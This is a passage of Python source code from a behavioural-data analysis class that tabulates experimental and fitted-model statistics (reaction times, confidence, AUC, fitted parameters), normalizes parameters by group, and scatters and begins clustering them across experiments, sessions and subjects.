These fields should be used to get the\n\t\t\t\tcorresponding experimental and theoretical entries.\n\t\t\t\t\n\t\t\t\tList of experimental entries:\n\t\t\t\t- experiment: Experiment\n\t\t\t\t- name: Subject Name\n\t\t\t\t- session: Session\n\t\t\t\t- n: Number of trials\n\t\t\t\t- auc: Area under the ROC curve\n\t\t\t\t- multi_mod_index: Hartigan's dip test statistic\n\t\t\t\t- rt_mean: Mean RT\n\t\t\t\t- hit_rt_mean: Mean RT for the correct trials\n\t\t\t\t- miss_rt_mean: Mean RT for the incorrect trials\n\t\t\t\t- performance_mean: Mean performance\n\t\t\t\t- confidence_mean: Mean confidence\n\t\t\t\t- hit_confidence_mean: Mean confidence for the correct trials\n\t\t\t\t- miss_confidence_mean: Mean confidence for the incorrect trials\n\t\t\t\t- rt_std: Standard deviation of RT\n\t\t\t\t- hit_rt_std: Standard deviation of RT for the correct trials\n\t\t\t\t- miss_rt_std: Standard deviation of RT for the incorrect trials\n\t\t\t\t- performance_std: Standard deviation of performance\n\t\t\t\t- confidence_std: Standard deviation of confidence\n\t\t\t\t- hit_confidence_std: Standard deviation of confidence for the correct trials\n\t\t\t\t- miss_confidence_std: Standard deviation of confidence for the incorrect trials\n\t\t\t\t- rt_median: Median RT\n\t\t\t\t- hit_rt_median: Median RT for the correct trials\n\t\t\t\t- miss_rt_median: Median RT for the incorrect trials\n\t\t\t\t- confidence_median: Median confidence\n\t\t\t\t- hit_confidence_median: Median confidence for the correct trials\n\t\t\t\t- miss_confidence_median: Median confidence for the incorrect trials\n\t\t\t\t\n\t\t\t\tList of theoretical entries:\n\t\t\t\t- experiment: Experiment\n\t\t\t\t- name: Subject Name\n\t\t\t\t- session: Session\n\t\t\t\t- full_merit: Fitter full_merit value\n\t\t\t\t- full_confidence_merit: Fitter full_confidence_merit value\n\t\t\t\t- confidence_only_merit: Fitter confidence_only_merit value\n\t\t\t\t- auc: Area under the ROC curve\n\t\t\t\t- rt_mean: Mean RT\n\t\t\t\t- hit_rt_mean: Mean RT for the correct trials\n\t\t\t\t- miss_rt_mean: Mean RT for the incorrect trials\n\t\t\t\t- performance_mean: Mean performance\n\t\t\t\t- confidence_mean: Mean confidence\n\t\t\t\t- hit_confidence_mean: Mean confidence for the correct trials\n\t\t\t\t- miss_confidence_mean: Mean confidence for the incorrect trials\n\t\t\t\t- rt_median: Median RT\n\t\t\t\t- hit_rt_median: Median RT for the correct trials\n\t\t\t\t- miss_rt_median: Median RT for the incorrect trials\n\t\t\t\t- confidence_median: Median confidence\n\t\t\t\t- hit_confidence_median: Median confidence for the correct trials\n\t\t\t\t- miss_confidence_median: Median confidence for the incorrect trials\n\t\t\t\t- cost: Fitter 'cost' parameter value\n\t\t\t\t- internal_var: Fitter 'internal_var' parameter value\n\t\t\t\t- phase_out_prob: Fitter 'phase_out_prob' parameter value\n\t\t\t\t- dead_time: Fitter 'dead_time' parameter value\n\t\t\t\t- dead_time_sigma: Fitter 'dead_time_sigma' parameter value\n\t\t\t\t- high_confidence_threshold: Fitter 'high_confidence_threshold' parameter value\n\t\t\t\t- confidence_map_slope: Fitter 'confidence_map_slope' parameter value\n\t\t\n\t\t\"\"\"\n\t\tif summary is None:\n\t\t\tsummary = self.get_summary()\n\t\t\n\t\texperimental = []\n\t\texperimental_ind_names = []\n\t\ttheoretical = []\n\t\ttheoretical_ind_names = []\n\t\tmax_experiment_len = 0\n\t\tmax_name_len = 0\n\t\tparameter_names = []\n\t\tmissing_fit = []\n\t\tfor counter,k in enumerate(summary['experimental'].keys()):\n\t\t\texp = 
summary['experimental'][k]\n\t\t\tfor exp_k in exp.keys():\n\t\t\t\tif exp_k=='experiment':\n\t\t\t\t\tmax_experiment_len = max([max_experiment_len,len(exp[exp_k])])\n\t\t\t\telif exp_k=='name':\n\t\t\t\t\tmax_name_len = max([max_name_len,len(str(exp[exp_k]))])\n\t\t\t\tif exp_k not in ['means','stds','medians']:\n\t\t\t\t\tif exp_k not in experimental_ind_names:\n\t\t\t\t\t\texperimental_ind_names.append(exp_k)\n\t\t\t\t\t\texperimental.append([exp[exp_k]])\n\t\t\t\t\telse:\n\t\t\t\t\t\texperimental[experimental_ind_names.index(exp_k)].append(exp[exp_k])\n\t\t\t\telse:\n\t\t\t\t\tfor nested_key in exp[exp_k].keys():\n\t\t\t\t\t\tcomposed_key = nested_key+{'means':'_mean','stds':'_std','medians':'_median'}[exp_k]\n\t\t\t\t\t\tif composed_key not in experimental_ind_names:\n\t\t\t\t\t\t\texperimental_ind_names.append(composed_key)\n\t\t\t\t\t\t\texperimental.append([exp[exp_k][nested_key]])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\texperimental[experimental_ind_names.index(composed_key)].append(exp[exp_k][nested_key])\n\t\t\ttry:\n\t\t\t\tteo = summary['theoretical'][k]\n\t\t\texcept:\n\t\t\t\tmissing_fit.append(counter)\n\t\t\t\tcontinue\n\t\t\tfor teo_k in teo.keys():\n\t\t\t\tif teo_k=='experiment':\n\t\t\t\t\tmax_experiment_len = max([max_experiment_len,len(teo[teo_k])])\n\t\t\t\telif teo_k=='name':\n\t\t\t\t\tmax_name_len = max([max_name_len,len(str(teo[teo_k]))])\n\t\t\t\tif teo_k!='parameters':\n\t\t\t\t\tif teo_k not in theoretical_ind_names:\n\t\t\t\t\t\ttheoretical_ind_names.append(teo_k)\n\t\t\t\t\t\ttheoretical.append([teo[teo_k]])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].append(teo[teo_k])\n\t\t\t\telse:\n\t\t\t\t\tfor par in teo[teo_k].keys():\n\t\t\t\t\t\tpar = str(par)\n\t\t\t\t\t\tif par=='high_confidence_threshold':\n\t\t\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par] if teo[teo_k][par]<=2. else np.nan\n\t\t\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par]+0.7/teo[teo_k]['confidence_map_slope']\n\t\t\t\t\t\t\t\t#~ val = teo[teo_k][par]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tval = teo[teo_k][par]\n\t\t\t\t\t\telif par=='confidence_map_slope':\n\t\t\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par] if teo[teo_k][par]<=100. else np.nan\n\t\t\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par] if teo[teo_k][par]<=40. 
else np.nan\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tval = teo[teo_k][par]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tval = teo[teo_k][par]\n\t\t\t\t\t\tif par not in parameter_names:\n\t\t\t\t\t\t\tparameter_names.append(par)\n\t\t\t\t\t\t\ttheoretical_ind_names.append(par)\n\t\t\t\t\t\t\ttheoretical.append([val])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttheoretical[theoretical_ind_names.index(par)].append(val)\n\t\tfor ind in missing_fit:\n\t\t\texperiment = experimental[experimental_ind_names.index('experiment')][ind]\n\t\t\tsession = experimental[experimental_ind_names.index('session')][ind]\n\t\t\tname = experimental[experimental_ind_names.index('name')][ind]\n\t\t\tif len(theoretical_ind_names)==0:\n\t\t\t\ttheoretical_ind_names = ['experiment','name','session',\n\t\t\t\t\t\t\t\t\t\t 'full_merit','full_confidence_merit','confidence_only_merit',\n\t\t\t\t\t\t\t\t\t\t 'auc','rt_mean','hit_rt_mean','miss_rt_mean','performance_mean',\n\t\t\t\t\t\t\t\t\t\t 'confidence_mean','hit_confidence_mean','miss_confidence_mean',\n\t\t\t\t\t\t\t\t\t\t 'rt_median','hit_rt_median','miss_rt_median','confidence_median',\n\t\t\t\t\t\t\t\t\t\t 'hit_confidence_median','miss_confidence_median',\n\t\t\t\t\t\t\t\t\t\t 'cost','internal_var','phase_out_prob','dead_time','dead_time_sigma',\n\t\t\t\t\t\t\t\t\t\t 'high_confidence_threshold','confidence_map_slope']\n\t\t\t\tfor i in range(len(theoretical_ind_names)):\n\t\t\t\t\ttheoretical.append([])\n\t\t\tfor teo_k_ind,teo_k in enumerate(theoretical_ind_names):\n\t\t\t\tif teo_k=='experiment':\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,experiment)\n\t\t\t\telif teo_k=='session':\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,session)\n\t\t\t\telif teo_k=='name':\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,name)\n\t\t\t\telse:\n\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].insert(ind,np.nan)\n\t\t\n\t\tdtype_dict = {'experiment':'S'+str(max_experiment_len),\n\t\t\t\t\t 'n':'i',\n\t\t\t\t\t 'session':'i',\n\t\t\t\t\t 'name':'S'+str(max_name_len)}\n\t\texp_dtype = []\n\t\tfor exp_ind in experimental_ind_names:\n\t\t\ttry:\n\t\t\t\texp_dtype.append((str(exp_ind),dtype_dict[exp_ind]))\n\t\t\texcept:\n\t\t\t\texp_dtype.append((str(exp_ind),'f'))\n\t\tteo_dtype = []\n\t\tfor teo_ind in theoretical_ind_names:\n\t\t\ttry:\n\t\t\t\tteo_dtype.append((str(teo_ind),dtype_dict[teo_ind]))\n\t\t\texcept:\n\t\t\t\tteo_dtype.append((str(teo_ind),'f'))\n\t\tN = len(experimental[0])\n\t\texperimental_ = []\n\t\ttheoretical_ = []\n\t\tfor i in range(N):\n\t\t\texperimental_.append(tuple([e[i] for e in experimental]))\n\t\t\ttheoretical_.append(tuple([t[i] for t in theoretical]))\n\t\texperimental = np.array(experimental_,exp_dtype)\n\t\ttheoretical = np.array(theoretical_,teo_dtype)\n\t\t\n\t\tif normalize:\n\t\t\tgroup_dict = {'all':None,\n\t\t\t\t\t\t 'experiment':theoretical['experiment'],\n\t\t\t\t\t\t 'session':theoretical['session'],\n\t\t\t\t\t\t 'name':theoretical['name']}\n\t\t\tfor par in normalize.keys():\n\t\t\t\tgroup = group_dict[normalize[par]]\n\t\t\t\ttheoretical[par] = self.normalize_parameters(parameters=theoretical[par],\n\t\t\t\t\t\t\t\t\t group=group, normalization_function=normalization_function)\n\t\treturn experimental,theoretical\n\t\n\tdef normalize_parameters(self,parameters,group=None,normalization_function=lambda x: x/np.nanstd(x)):\n\t\t\"\"\"\n\t\tself.normalize_parameters(parameters,group,normalization_function=lambda x: x/np.nanstd(x))\n\t\t\n\t\tThe hierarchical clustering of 
parameters depends on the distance\n\t\tbetween parameters where each parameter name is interpreted as\n\t\ta separate dimension in a certain metric space (Default is\n\t\teuclidean but other metrics can be specified in the affinity).\n\t\tHowever, each parameter is usually located in an interval that\n\t\thas a completely different scale across experiments and parameter\n\t\tnames. This function seeks to normalize the parameter values\n\t\tto make them inhabit similarly sized regions, and thus improve\n\t\tthe clustering. The most problematic parameter is the\n\t\t'internal_var' because its units vary between experiments.\n\t\tTo solve this, normalize_parameters allows the user to specify\n\t\tdifferent grouping methods for different parameters.\n\t\t\n\t\tInput:\n\t\t\tparameters: A 1D numpy array with the parameter values for\n\t\t\t\ta single parameter name.\n\t\t\tgroup: Can be None or a 1D numpy array with the same\n\t\t\t\tnumber of elements as the input 'parameters'. The\n\t\t\t\tdistinct values of 'group' define separate groups\n\t\t\t\tand the normalization function is called separately\n\t\t\t\ton each group. For example, the input 'group'\n\t\t\t\tcould be an array with the corresponding experiment of\n\t\t\t\teach parameter value. Thus, the normalization_function\n\t\t\t\twould be called once for each experiment on the separate\n\t\t\t\tsubsets of parameters that corresponded to each\n\t\t\t\texperiment. If None, the normalization_function is\n\t\t\t\tcalled on the entire 'parameters' array.\n\t\t\tnormalization_function: A callable that is called on each\n\t\t\t\tgroup to normalize the parameter values. Default is\n\t\t\t\tlambda x: x/numpy.nanstd(x). Other normalization_function\n\t\t\t\timplementations must be able to broadcast numpy arrays,\n\t\t\t\treceive a single numpy array as input and return another\n\t\t\t\tnumpy array with the same shape as the input array.\n\t\t\t\t\n\t\t\n\t\tOutput:\n\t\t\tnormalized_parameters: A numpy array that is the result of\n\t\t\t\tcalling the normalization_function on each group.\n\t\t\n\t\t\"\"\"\n\t\tif group is None:\n\t\t\treturn normalization_function(parameters)\n\t\telse:\n\t\t\tnormalized_parameters = np.empty_like(parameters)\n\t\t\tunique_group = np.unique(group)\n\t\t\tfor g in unique_group:\n\t\t\t\tinds = group==g\n\t\t\t\tnormalized_parameters[inds] = normalization_function(parameters[inds])\n\t\t\treturn normalized_parameters\n\t\n\tdef scatter_parameters(self,merge=None,show=False):\n\t\t\"\"\"\n\t\tself.scatter_parameters(merge=None,show=False)\n\t\t\n\t\tPlot the parameters 'internal_var', 'cost' and 'phase_out_prob'\n\t\tagainst each other, and also plot 'high_confidence_threshold'\n\t\tagainst 'confidence_map_slope' in a 2x2 subplot with a colorbar\n\t\tthat represents subject names or experiments depending on the\n\t\t'merge' input value.\n\t\t\n\t\tInput:\n\t\t\tmerge: None, 'names' or 'sessions'. If None, all the parameters\n\t\t\t\tare plotted. If 'names', the parameters that correspond\n\t\t\t\tto different subject names but to the same experiment\n\t\t\t\tand session are pooled together. 
If 'sessions', the same\n\t\t\t\tprocedure is applied but for parameters that correspond\n\t\t\t\tto different sessions.\n\t\t\tshow: A bool that if True, shows the plotted figure and\n\t\t\t\tfreezes the execution until said figure is closed.\n\t\t\n\t\t\"\"\"\n\t\ttry:\n\t\t\tunames,indnames = np.unique(self._names,return_inverse=True)\n\t\texcept:\n\t\t\tself.get_parameter_array_from_summary()\n\t\t\tunames,indnames = np.unique(self._names,return_inverse=True)\n\t\tuexps,indexps = np.unique(self._experiments,return_inverse=True)\n\t\tusess,indsess = np.unique(self._sessions,return_inverse=True)\n\t\tif not merge is None:\n\t\t\tif merge=='names':\n\t\t\t\ttemp_pars = []\n\t\t\t\ttemp_sess = []\n\t\t\t\ttemp_exps = []\n\t\t\t\tfor e in uexps:\n\t\t\t\t\tfor s in usess:\n\t\t\t\t\t\tinds = np.logical_and(self._experiments==e,self._sessions==s)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\ttemp_pars.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\ttemp_sess.append(s)\n\t\t\t\t\t\t\ttemp_exps.append(e)\n\t\t\t\tnames = None\n\t\t\t\tparameters = np.array(temp_pars)\n\t\t\t\tsessions = np.array(temp_sess)\n\t\t\t\texperiments = np.array(temp_exps)\n\t\t\t\tcolors = ['r','g','b']\n\t\t\t\tcbar_im = np.array([[1,0,0],[0,0.5,0],[0,0,1]])\n\t\t\t\tcbar_labels = ['2AFC','Auditivo','Luminancia']\n\t\t\t\tcategories,ind_categories = np.unique(sessions,return_inverse=True)\n\t\t\t\tmarkers = ['o','s','D']\n\t\t\t\tlabels = ['Session 1','Session 2','Session 3']\n\t\t\telif merge=='sessions':\n\t\t\t\ttemp_pars = []\n\t\t\t\ttemp_nams = []\n\t\t\t\ttemp_exps = []\n\t\t\t\tfor e in uexps:\n\t\t\t\t\tfor n in unames:\n\t\t\t\t\t\tinds = np.logical_and(self._experiments==e,self._names==n)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\ttemp_pars.append(self.pooling_func(self._parameters[inds],axis=0))\n\t\t\t\t\t\t\ttemp_nams.append(n)\n\t\t\t\t\t\t\ttemp_exps.append(e)\n\t\t\t\tsessions = None\n\t\t\t\tparameters = np.array(temp_pars)\n\t\t\t\tnames = np.array(temp_nams)\n\t\t\t\texperiments = np.array(temp_exps)\n\t\t\t\tunames,indnames = np.unique(names,return_inverse=True)\n\t\t\t\tcolors = [plt.get_cmap('rainbow')(x) for x in indnames.astype(np.float)/float(len(unames)-1)]\n\t\t\t\tcbar_im = np.array([plt.get_cmap('rainbow')(x) for x in np.arange(len(unames),dtype=np.float)/float(len(unames)-1)])\n\t\t\t\tcbar_labels = [str(n) for n in unames]\n\t\t\t\tcategories,ind_categories = np.unique(experiments,return_inverse=True)\n\t\t\t\tmarkers = ['o','s','D']\n\t\t\t\tlabels = ['2AFC','Auditivo','Luminancia']\n\t\t\telse:\n\t\t\t\traise ValueError('Unknown merge option: {0}'.format(merge))\n\t\telse:\n\t\t\tnames = np.copy(self._names)\n\t\t\tsessions = np.copy(self._sessions)\n\t\t\texperiments = np.copy(self._experiments)\n\t\t\tparameters = np.copy(self._parameters)\n\t\t\ta = np.array([sessions,experiments]).T\n\t\t\tb = np.ascontiguousarray(a).view(np.dtype((np.void, a.dtype.itemsize * a.shape[1])))\n\t\t\tcategories, ind_categories = np.unique(b, return_inverse=True)\n\t\t\tcolors = [plt.get_cmap('rainbow')(x) for x in indnames.astype(np.float)/float(len(unames)-1)]\n\t\t\tcbar_im = np.array([plt.get_cmap('rainbow')(x) for x in np.arange(len(unames),dtype=np.float)/float(len(unames)-1)])\n\t\t\tcbar_labels = [str(n) for n in unames]\n\t\t\tmarkers = ['o','+','s','^','v','8','D','*']\n\t\t\tlabels = []\n\t\t\tfor i,c in enumerate(categories):\n\t\t\t\tinds = ind_categories==i\n\t\t\t\tsession = sessions[inds][0]\n\t\t\t\texperiment = experiments[inds][0]\n\t\t\t\tlabels.append('Exp = 
'+str(experiment)+' Ses = '+str(session))\n\t\t\n\t\tdecision_inds = np.array([i for i,pn in enumerate(self._parameter_names) if pn in ['cost','internal_var','phase_out_prob']],dtype=np.intp)\n\t\tconfidence_inds = np.array([i for i,pn in enumerate(self._parameter_names) if pn in ['high_confidence_threshold','confidence_map_slope']],dtype=np.intp)\n\t\t\n\t\tplt.figure(figsize=(10,8))\n\t\tgs1 = gridspec.GridSpec(2, 2, left=0.05, right=0.85)\n\t\tgs2 = gridspec.GridSpec(1, 1, left=0.90, right=0.93)\n\t\tax1 = plt.subplot(gs1[0])\n\t\tax2 = plt.subplot(gs1[1])\n\t\tax3 = plt.subplot(gs1[2])\n\t\tax4 = plt.subplot(gs1[3])\n\t\tfor cat_index,category in enumerate(categories):\n\t\t\tinds = ind_categories==cat_index\n\t\t\tax1.scatter(parameters[inds,decision_inds[0]],parameters[inds,decision_inds[1]],c=colors,marker=markers[cat_index],cmap='rainbow')\n\t\t\tax2.scatter(parameters[inds,decision_inds[0]],parameters[inds,decision_inds[2]],c=colors,marker=markers[cat_index],cmap='rainbow')\n\t\t\tax3.scatter(parameters[inds,decision_inds[1]],parameters[inds,decision_inds[2]],c=colors,marker=markers[cat_index],cmap='rainbow')\n\t\t\tax4.scatter(parameters[inds,confidence_inds[0]],parameters[inds,confidence_inds[1]],c=colors,marker=markers[cat_index],cmap='rainbow',label=labels[cat_index])\n\t\tax1.set_xlabel(self._parameter_names[decision_inds[0]])\n\t\tax1.set_ylabel(self._parameter_names[decision_inds[1]])\n\t\tax2.set_xlabel(self._parameter_names[decision_inds[0]])\n\t\tax2.set_ylabel(self._parameter_names[decision_inds[2]])\n\t\tax3.set_xlabel(self._parameter_names[decision_inds[1]])\n\t\tax3.set_ylabel(self._parameter_names[decision_inds[2]])\n\t\tax4.legend(loc='upper center', fancybox=True, framealpha=0.5, scatterpoints=3)\n\t\tax4.set_xlabel(self._parameter_names[confidence_inds[0]])\n\t\tax4.set_ylabel(self._parameter_names[confidence_inds[1]])\n\t\t\n\t\tax_cbar = plt.subplot(gs2[0])\n\t\tplt.imshow(cbar_im.reshape((-1,1,cbar_im.shape[1])),aspect='auto',cmap=None,interpolation='none',origin='lower',extent=[0,1,0.5,len(cbar_labels)+0.5])\n\t\tax_cbar.xaxis.set_ticks([])\n\t\tax_cbar.yaxis.set_ticks(np.arange(len(cbar_labels))+1)\n\t\tax_cbar.yaxis.set_ticklabels(cbar_labels)\n\t\tax_cbar.tick_params(labelleft=False, labelright=True)\n\t\t\n\t\tif show:\n\t\t\tplt.show(True)\n\t\n\tdef controlled_scatter(self,scattered_parameters=['cost','internal_var','phase_out_prob'],axes=None,color_category='experiment',marker_category='session',merge=None,show=False):\n\t\t\"\"\"\n\t\tself.controlled_scatter(scattered_parameters=['cost','internal_var','phase_out_prob'],axes=None,color_category='experiment',marker_category='session',merge=None,show=False)\n\t\t\n\t\tA more refined version of the method scatter_parameters where\n\t\tit is possible to select the group of parameters to plot against\n\t\teach other and the axes on which to plot them, along with other\n\t\toptions.\n\t\t\n\t\tInput:\n\t\t\tscattered_parameters: A list of valid Fitter parameter\n\t\t\t\tnames to plot against each other. The list must have 2\n\t\t\t\tor 3 elements, and the scatter will be in 2D or 3D\n\t\t\t\taccordingly.\n\t\t\taxes: None or a matplotlib.Axes or mpl_toolkits.mplot3d.Axes3D\n\t\t\t\tinstance. If None, the axes instance is created on the fly\n\t\t\t\tin a new figure. If not None, then the supplied axes will be\n\t\t\t\tused to call the scatter method.\n\t\t\tcolor_category: Can be 'experiment', 'session' or 'name'. 
It\n\t\t\t\tis used to indicate whether the marker's color should encode\n\t\t\t\tthe corresponding experiment, session or subject name.\n\t\t\tmarker_category: Can be 'experiment' or 'session'. It is\n\t\t\t\tused to indicate whether the marker shape should encode the\n\t\t\t\tcorresponding experiment or session.\n\t\t\tmerge: Can be None, 'experiments', 'names' or 'sessions',\n\t\t\t\tand has the same behavior as the 'merge' input in\n\t\t\t\tthe scatter_parameters method. Refer to the\n\t\t\t\tscatter_parameters docstring for further details.\n\t\t\tshow: A bool that if True, shows the plotted figure and\n\t\t\t\tfreezes the execution until said figure is closed.\n\t\t\n\t\tOutput:\n\t\t\tIf show is True, this function returns None.\n\t\t\tIf show is False, this function returns the Axes instance\n\t\t\twhich was used to scatter the parameters.\n\t\t\n\t\t\"\"\"\n\t\tif len(scattered_parameters)<2 or len(scattered_parameters)>3:\n\t\t\traise ValueError('Can only scatter sets of 2 or 3 parameters. User supplied scattered_parameters={0}'.format(scattered_parameters))\n\t\telif len(scattered_parameters)==2:\n\t\t\tthreeD = False\n\t\telse:\n\t\t\tthreeD = True\n\t\ttry:\n\t\t\tparams = self._parameters\n\t\texcept:\n\t\t\tself.get_parameter_array_from_summary()\n\t\t\tparams = self._parameters\n\t\t_x = params[:,self._parameter_names.index(scattered_parameters[0])]\n\t\t_y = params[:,self._parameter_names.index(scattered_parameters[1])]\n\t\tif threeD:\n\t\t\t_z = params[:,self._parameter_names.index(scattered_parameters[2])]\n\t\telse:\n\t\t\t_z = None\n\t\tif color_category not in [None,'experiment','session','name']:\n\t\t\traise ValueError(\"color_category must be in [None,'experiment','session','name']. User supplied: {0}\".format(color_category))\n\t\tif marker_category not in [None, 'experiment','session']:\n\t\t\traise ValueError(\"marker_category must be in [None,'experiment','session']. 
User supplied: {0}\".format(marker_category))\n\t\tif marker_category==color_category and not marker_category is None:\n\t\t\traise ValueError(\"If color_category and marker_category are not None, they must be different\")\n\t\tif merge==(marker_category+'s') or merge==(color_category+'s'):\n\t\t\traise ValueError(\"Cannot set merge equal to color_category or marker_category\")\n\t\t\n\t\tif not merge is None:\n\t\t\tunams,indnams = np.unique(self._names,return_inverse=True)\n\t\t\tusess,indsess = np.unique(self._sessions,return_inverse=True)\n\t\t\tuexps,indexps = np.unique(self._experiments,return_inverse=True)\n\t\t\tcat_inds = []\n\t\t\tnames = []\n\t\t\tsessions = []\n\t\t\texperiments = []\n\t\t\tif merge=='experiments':\n\t\t\t\tfor i,un in enumerate(unams):\n\t\t\t\t\tfor us in usess:\n\t\t\t\t\t\tinds = np.logical_and(self._names==un,self._sessions==us)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tcat_inds.append(inds)\n\t\t\t\t\t\t\tnames.append(i)\n\t\t\t\t\t\t\tsessions.append(us)\n\t\t\telif merge=='sessions':\n\t\t\t\tfor i,un in enumerate(unams):\n\t\t\t\t\tfor ue in uexps:\n\t\t\t\t\t\tinds = np.logical_and(self._names==un,self._experiments==ue)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tcat_inds.append(inds)\n\t\t\t\t\t\t\tnames.append(i)\n\t\t\t\t\t\t\texperiments.append(ue)\n\t\t\telif merge=='names':\n\t\t\t\tfor ue in uexps:\n\t\t\t\t\tfor us in usess:\n\t\t\t\t\t\tinds = np.logical_and(self._experiments==ue,self._sessions==us)\n\t\t\t\t\t\tif any(inds):\n\t\t\t\t\t\t\tcat_inds.append(inds)\n\t\t\t\t\t\t\texperiments.append(ue)\n\t\t\t\t\t\t\tsessions.append(us)\n\t\t\telse:\n\t\t\t\traise ValueError(\"Unknown merge option supplied: {0}. Available options are None, 'experiments', 'sessions' or 'names'\".format(merge))\n\t\t\tx = []\n\t\t\ty = []\n\t\t\tif threeD:\n\t\t\t\tz = []\n\t\t\tfor inds in cat_inds:\n\t\t\t\tx.append(self.pooling_func(_x[inds],axis=0))\n\t\t\t\ty.append(self.pooling_func(_y[inds],axis=0))\n\t\t\t\tif threeD:\n\t\t\t\t\tz.append(self.pooling_func(_z[inds],axis=0))\n\t\t\tx = np.array(x)\n\t\t\ty = np.array(y)\n\t\t\tif threeD:\n\t\t\t\tz = np.array(z)\n\t\telse:\n\t\t\tunams,names = np.unique(self._names,return_inverse=True)\n\t\t\tsessions = self._sessions\n\t\t\texperiments = self._experiments\n\t\t\tx = _x\n\t\t\ty = _y\n\t\t\tif threeD:\n\t\t\t\tz = _z\n\t\t\n\t\tif not color_category is None:\n\t\t\tif color_category=='experiment':\n\t\t\t\tc = [{'2AFC':[1.,0.,0.],'Auditivo':[0.,0.5,0.],'Luminancia':[0.,0.,1.]}[exp] for exp in experiments]\n\t\t\telif color_category=='session':\n\t\t\t\tc = [{'1':[1.,0.,0.],'2':[0.,0.5,0.],'3':[0.,0.,1.]}[ses] for ses in sessions]\n\t\t\telse:\n\t\t\t\tc = [plt.get_cmap('rainbow')(x) for x in names.astype(np.float)/float(len(unams)-1)]\n\t\t\tc = np.array(c)\n\t\telse:\n\t\t\tc = 'k'\n\t\t\t\n\t\tif not marker_category is None:\n\t\t\tif marker_category=='experiment':\n\t\t\t\tuexps,indexps = np.unique(experiments,return_inverse=True)\n\t\t\t\tmarker_inds = [indexps==i for i,ue in enumerate(uexps)]\n\t\t\t\tmarkers = [{'2AFC':'o','Auditivo':'s','Luminancia':'D'}[exp] for exp in uexps]\n\t\t\t\tlabels = [{'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}[exp] for exp in uexps]\n\t\t\telse:\n\t\t\t\tusess,indsess = np.unique(sessions,return_inverse=True)\n\t\t\t\tmarker_inds = [indsess==i for i,ue in enumerate(usess)]\n\t\t\t\tmarkers = [{1:'o',2:'s',3:'D'}[int(ses)] for ses in usess]\n\t\t\t\tlabels = [{1:'Ses 1',2:'Ses 2',3:'Ses 3'}[int(ses)] for ses in usess]\n\t\telse:\n\t\t\tmarker_inds = 
[np.ones(len(x),dtype=np.bool)]\n\t\t\tmarkers = ['o']\n\t\t\tlabels = [None]\n\t\t\n\t\tif axes is None:\n\t\t\tfig = plt.figure()\n\t\t\tif threeD:\n\t\t\t\taxes = fig.add_subplot(111, projection='3d')\n\t\t\telse:\n\t\t\t\taxes = plt.subplot(111)\n\t\t\n\t\tparameter_aliases = {'cost':r'$c$',\\\n\t\t\t\t\t\t\t'internal_var':r'$\\sigma^{2}$',\\\n\t\t\t\t\t\t\t'phase_out_prob':r'$p_{po}$',\\\n\t\t\t\t\t\t\t'high_confidence_threshold':r'$C_{H}$',\\\n\t\t\t\t\t\t\t'confidence_map_slope':r'$\\alpha$',\\\n\t\t\t\t\t\t\t'dead_time':r'$\\tau_{c}$',\\\n\t\t\t\t\t\t\t'dead_time_sigma':r'$\\sigma_{c}$'}\n\t\tif not threeD:\n\t\t\tfor m,inds,label in zip(markers,marker_inds,labels):\n\t\t\t\ttry:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],c=c[inds],marker=m, s=40, label=label)\n\t\t\t\texcept:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],c=c,marker=m, s=40, label=label)\n\t\t\taxes.set_xlabel(parameter_aliases[scattered_parameters[0]],fontsize=16)\n\t\t\taxes.set_ylabel(parameter_aliases[scattered_parameters[1]],fontsize=16)\n\t\t\taxes.set_xticklabels([])\n\t\t\taxes.set_yticklabels([])\n\t\telse:\n\t\t\tfor m,inds,label in zip(markers,marker_inds,labels):\n\t\t\t\ttry:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],z[inds],c=c[inds],marker=m, s=40, label=label)\n\t\t\t\texcept:\n\t\t\t\t\taxes.scatter(x[inds],y[inds],z[inds],c=c,marker=m, s=40, label=label)\n\t\t\taxes.set_xlabel(parameter_aliases[scattered_parameters[0]],fontsize=16)\n\t\t\taxes.set_ylabel(parameter_aliases[scattered_parameters[1]],fontsize=16)\n\t\t\taxes.set_zlabel(parameter_aliases[scattered_parameters[2]],fontsize=16)\n\t\t\taxes.view_init(elev=None,azim=145)\n\t\t\taxes.set_xticklabels([])\n\t\t\taxes.set_yticklabels([])\n\t\t\taxes.set_zticklabels([])\n\t\t\n\t\tif show:\n\t\t\tplt.show(True)\n\t\t\treturn None\n\t\telse:\n\t\t\treturn axes\n\t\n\tdef cluster(self,merge=None,clustered_parameters=['cost','internal_var','phase_out_prob'],filter_nans='post'):\n\t\t\"\"\"\n\t\tself.cluster(merge=None,clustered_parameters=['cost','internal_var','phase_out_prob'],filter_nans='post')\n\t\t\n\t\tMethod that performs the hierarchical clustering of the Fitter\n\t\tparameters.\n\t\t\n\t\tInput:\n\t\t\tmerge: None, or 'experiments', 'sessions', 'names'. This\n\t\t\t\tinput specifies if and how the parameters should be\n\t\t\t\tmerged before being clustered. Initially, there is one\n\t\t\t\tparameter vector for each individual experiment, session\n\t\t\t\tand name tuple. If merge is None, all the 